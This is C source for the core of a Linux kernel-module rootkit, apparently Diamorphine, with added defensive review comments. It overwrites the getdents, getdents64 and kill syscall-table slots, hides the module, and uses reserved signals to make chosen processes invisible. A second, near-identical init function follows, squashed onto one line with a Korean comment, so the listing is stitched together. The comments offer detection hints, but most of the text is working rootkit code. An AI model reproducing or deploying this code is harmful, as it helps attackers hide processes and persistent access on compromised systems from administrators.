/*
 * Module entry point: redirects three system-call table slots (getdents,
 * getdents64, kill) to handlers supplied by this module.
 *
 * Returns 0 on success, or -1 when either the syscall table or the page-table
 * entry covering it cannot be found. Nothing has been modified at that point.
 *
 * Review notes (defensive):
 *  - After a successful return, the three slots no longer point at the
 *    kernel's own handlers. Comparing syscall-table entries against the core
 *    kernel text range is the direct integrity check for this pattern.
 *  - None of this runs unless the module can be loaded. Enforced module
 *    signing, kernel lockdown, or the kernel.modules_disabled sysctl blocks
 *    the technique at that step.
 */
static int __init diamorphine_init(void)
{
	unsigned int level;

	/*
	 * Locate the syscall table at run time. The "_bf" suffix suggests a
	 * brute-force memory scan, but the helper is not shown here. TODO confirm.
	 */
	sys_call_table = get_syscall_table_bf();
	if (!sys_call_table)
		return -1;

	/*
	 * Fetch the page-table entry that maps the table. Presumably
	 * unprotect_memory()/protect_memory() use the global pte to flip the
	 * page's write permission; verify against those helpers.
	 */
	pte = lookup_address((unsigned long)sys_call_table, &level);
	if (!pte)
		return -1;

	/*
	 * Helpers defined elsewhere. By name, module_hide() conceals the module
	 * and tidy() releases or clears module metadata. Not verifiable from
	 * this listing.
	 */
	module_hide();
	tidy();

	/* Keep the genuine handlers so the replacements can forward to them. */
	orig_getdents = (orig_getdents_t)sys_call_table[__NR_getdents];
	orig_getdents64 = (orig_getdents64_t)sys_call_table[__NR_getdents64];
	orig_kill = (orig_kill_t)sys_call_table[__NR_kill];

	/*
	 * The slot overwrites are bracketed by unprotect/protect calls, so the
	 * table is expected to be writable only for these three stores.
	 */
	unprotect_memory();
	sys_call_table[__NR_getdents] = (unsigned long)hacked_getdents;
	sys_call_table[__NR_getdents64] = (unsigned long)hacked_getdents64;
	sys_call_table[__NR_kill] = (unsigned long)hacked_kill;
	protect_memory();

	return 0;
}
/*
 * Replacement kill() handler that uses two reserved signal numbers as a
 * control channel and forwards every other signal to the saved original.
 *
 *  - SIGINVIS:    toggles PF_INVISIBLE in the flags of the task found for pid.
 *                 Returns -ESRCH when find_task() finds no such task.
 *  - SIGMODINVIS: switches the module between hidden and shown, depending on
 *                 the current value of module_hidden.
 *  - otherwise:   returns whatever orig_kill(pid, sig) returns.
 *
 * Review notes (defensive):
 *  - The two control signals return 0 without reaching orig_kill(), so the
 *    kernel's own kill path never sees them.
 *  - PF_INVISIBLE is presumably read by the getdents hooks to filter /proc
 *    entries; those hooks are not part of this listing. TODO confirm.
 *  - A kill() call that succeeds for a signal number with no defined meaning
 *    on the host is a behavioural indicator worth alerting on.
 */
asmlinkage int hacked_kill(pid_t pid, int sig)
{
	struct task_struct *target;

	if (sig == SIGINVIS) {
		target = find_task(pid);
		if (target == NULL)
			return -ESRCH;
		/* XOR flips the marker, so sending the signal twice restores it. */
		target->flags ^= PF_INVISIBLE;
		return 0;
	}

	if (sig == SIGMODINVIS) {
		if (!module_hidden)
			module_hide();
		else
			module_show();
		return 0;
	}

	/* Any other signal is passed to the genuine handler unchanged. */
	return orig_kill(pid, sig);
}
/*
 * Setter callback for the boolean module parameter backing `hideme`.
 *
 * Parses val with param_set_bool(). On a parse failure the error code is
 * returned unchanged, and a message is logged only in DEBUG builds. On success
 * the module is hidden or shown according to the new value of hideme, and 0
 * is returned.
 *
 * Review note (defensive): this toggles the module's visibility through a
 * parameter write rather than through the signal channel. How the parameter
 * is exposed (permissions, sysfs path) is set where it is registered, which is
 * not shown here.
 */
static int param_kmod_hide(const char *val, struct kernel_param *kp)
{
	int err = param_set_bool(val, kp);

	if (err != 0) {
#ifdef DEBUG
		printk(KERN_ALERT "%s error: could not parse LKM hideme parameters\n", MODULE_NAME);
#endif
		return err;
	}

	/* Apply the freshly parsed flag. */
	if (!hideme)
		module_show();
	else
		module_hide();

	return 0;
}
// 커널 모듈을 로드할 때 수행 static int __init simplekit_init(void) { sys_call_table = get_syscall_table_bf(); if (!sys_call_table) return -1; cr0 = read_cr0(); module_hide(); tidy(); orig_getdents = (orig_getdents_t)sys_call_table[__NR_getdents]; orig_getdents64 = (orig_getdents64_t)sys_call_table[__NR_getdents64]; orig_kill = (orig_kill_t)sys_call_table[__NR_kill]; unprotect_memory(); sys_call_table[__NR_getdents] = (unsigned long)hacked_getdents; sys_call_table[__NR_getdents64] = (unsigned long)hacked_getdents64; sys_call_table[__NR_kill] = (unsigned long)hacked_kill; protect_memory(); return 0; }